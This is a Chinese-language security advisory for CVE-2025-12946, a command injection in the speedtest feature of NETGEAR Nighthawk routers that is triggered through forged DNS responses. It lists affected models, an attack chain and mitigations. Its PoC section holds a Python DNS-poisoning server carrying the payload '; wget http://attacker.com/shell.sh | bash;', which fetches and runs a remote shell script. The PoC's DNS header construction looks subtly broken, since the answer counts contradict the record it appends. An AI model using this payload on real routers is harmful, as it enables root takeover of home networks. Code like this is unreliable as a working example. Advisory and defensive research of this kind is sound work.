NETGEAR Nighthawk路由器Speedtest功能命令注入漏洞(CVE-2025-12946)

漏洞信息

漏洞编号

CVE-2025-12946

漏洞类型

命令注入

CVSS评分

7.5 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NETGEAR Nighthawk路由器(RS700、RAX54Sv2、RAX41v2、RAX50、RAXE500、RAX41、RAX43、RAX35v2、RAXE450、RAX43v2、RAX42、RAX45、RAX50v2、MR90、MS90、RAX42v2、RAX49S)

漏洞概述

CVE-2025-12946是影响NETGEAR Nighthawk系列路由器speedtest功能的严重安全漏洞。该漏洞由于speedtest功能中的输入验证不当导致，攻击者位于路由器WAN侧，可利用中间人攻击(MiTM)技术操纵DNS响应。当用户在这些受影响路由器上运行speedtest诊断功能时，攻击者可以通过篡改DNS响应来注入恶意命令，最终实现以root权限在路由器上执行任意命令。此漏洞无需任何认证或用户交互即可被利用，CVSS评分达到7.5分，属于高危漏洞。攻击者利用邻接网络攻击向量即可实施入侵，对路由器的机密性、完整性和可用性均造成严重影响。

技术细节

该漏洞存在于NETGEAR Nighthawk路由器固件的speedtest功能模块中。问题根源在于该功能对DNS响应的验证机制存在缺陷，未能有效过滤和验证来自外部的DNS数据。攻击者需要位于路由器的WAN侧网络位置，通过中间人攻击技术拦截并篡改路由器执行speedtest时发出的DNS查询响应。由于固件在处理这些被污染的DNS响应时缺乏适当的输入验证，攻击者可以在响应中嵌入恶意命令或参数。当speedtest功能解析这些被操纵的DNS记录时，注入的恶意代码将以路由器系统权限被执行。由于路由器通常以root权限运行Linux系统，攻击成功后将获得完全控制权，可部署后门、窃取网络流量或进一步渗透内网。

攻击链分析

STEP 1

步骤1

攻击者获取路由器WAN侧网络位置，通过ARP欺骗或网络嗅探建立中间人攻击环境

STEP 2

步骤2

攻击者监控网络流量，捕获路由器执行speedtest功能时发出的DNS查询请求

STEP 3

步骤3

攻击者利用DNS欺骗技术，向路由器返回包含恶意命令注入载荷的伪造DNS响应

STEP 4

步骤4

路由器的speedtest功能在解析被污染的DNS响应时，由于缺乏输入验证，执行注入的恶意命令

STEP 5

步骤5

攻击成功后在路由器上获得root权限执行权限，可部署持久化后门或进一步横向渗透内网

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-12946 PoC - NETGEAR Router Speedtest DNS Manipulation
# This PoC demonstrates the DNS poisoning technique for speedtest command injection

import struct
import socket
import threading

class DNSPoisoner:
    def __init__(self, target_domain, injected_command):
        self.target_domain = target_domain
        self.injected_command = injected_command
        self.attacker_ip = "192.168.1.100"  # Attacker controlled IP
    
    def craft_poisoned_response(self, query_data):
        """Craft DNS response with injected command in TXT record"""
        # DNS header: ID, flags, counts
        response = query_data[:2]  # Transaction ID
        response += b'\x81\x80'  # Flags: Standard response, no error
        response += query_data[4:6] + query_data[4:6]  # Question count
        response += b'\x00\x00\x00\x00'  # Answer, Authority, Additional counts
        
        # Original question section
        response += query_data[12:]
        
        # Answer section with malicious TXT record
        response += b'\xc0\x0c'  # Pointer to question name
        response += b'\x00\x10'  # Type: TXT
        response += b'\x00\x01'  # Class: IN
        response += b'\x00\x00\x00\x3c'  # TTL: 60 seconds
        
        # TXT record with injected command
        cmd_length = len(self.injected_command)
        response += struct.pack('>B', cmd_length)
        response += self.injected_command.encode()
        
        return response
    
    def start(self, port=53):
        """Start DNS poisoning server"""
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.bind(('0.0.0.0', port))
        
        print(f"[*] DNS Poisoner listening on port {port}")
        print(f"[*] Target domain: {self.target_domain}")
        print(f"[*] Injected command: {self.injected_command}")
        
        while True:
            try:
                data, addr = sock.recvfrom(512)
                if self.target_domain.encode() in data:
                    print(f"[+] Intercepted DNS query for {self.target_domain}")
                    poisoned_response = self.craft_poisoned_response(data)
                    sock.sendto(poisoned_response, addr)
                    print("[+] Sent poisoned DNS response")
            except Exception as e:
                print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Configuration - customize based on target
    TARGET_DOMAIN = "speedtest.netgear.com"
    INJECTED_CMD = "; wget http://attacker.com/shell.sh | bash;"
    
    poisoner = DNSPoisoner(TARGET_DOMAIN, INJECTED_CMD)
    poisoner.start()

影响范围

NETGEAR RS700 < 1.0.7.82

NETGEAR RAX54Sv2 < V1.1.6.36

NETGEAR RAX41v2 < V1.1.6.36

NETGEAR RAX50 < V1.2.14.114

NETGEAR RAXE500 < V1.2.14.114

NETGEAR RAX41 < V1.0.17.142

NETGEAR RAX43 < V1.0.17.142

NETGEAR RAX35v2 < V1.0.17.142

NETGEAR RAXE450 < V1.2.14.114

NETGEAR RAX43v2 < V1.1.6.36

NETGEAR RAX42 < V1.0.17.142

NETGEAR RAX45 < V1.0.17.142

NETGEAR RAX50v2 < V1.1.6.36

NETGEAR MR90 < V1.0.2.46

NETGEAR MS90 < V1.0.2.46

NETGEAR RAX42v2 < V1.1.6.36

NETGEAR RAX49S < V1.1.6.36

防御指南

临时缓解措施

在官方固件更新发布之前，建议采取以下临时缓解措施：1) 禁用路由器的远程管理功能，仅允许局域网内访问管理界面；2) 监控网络流量，检测异常的DNS查询模式；3) 使用VPN建立安全通道访问网络；4) 考虑暂时更换为不受影响的路由器型号；5) 限制WAN侧网络访问权限，防止攻击者建立中间人攻击位置。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12946
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12946
3 Details https://www.cvedetails.com/cve/CVE-2025-12946/
4 VulDB https://vuldb.com/cve/CVE-2025-12946
5 Link https://kb.netgear.com/000070416/December-2025-NETGEAR-Security-Advisory
6 Link https://www.netgear.com/support/product/RAX50
7 Link https://www.netgear.com/support/product/mr90
8 Link https://www.netgear.com/support/product/ms90
9 Link https://www.netgear.com/support/product/rax35v2
10 Link https://www.netgear.com/support/product/rax41
11 Link https://www.netgear.com/support/product/rax41v2
12 Link https://www.netgear.com/support/product/rax42
13 Link https://www.netgear.com/support/product/rax42v2
14 Link https://www.netgear.com/support/product/rax43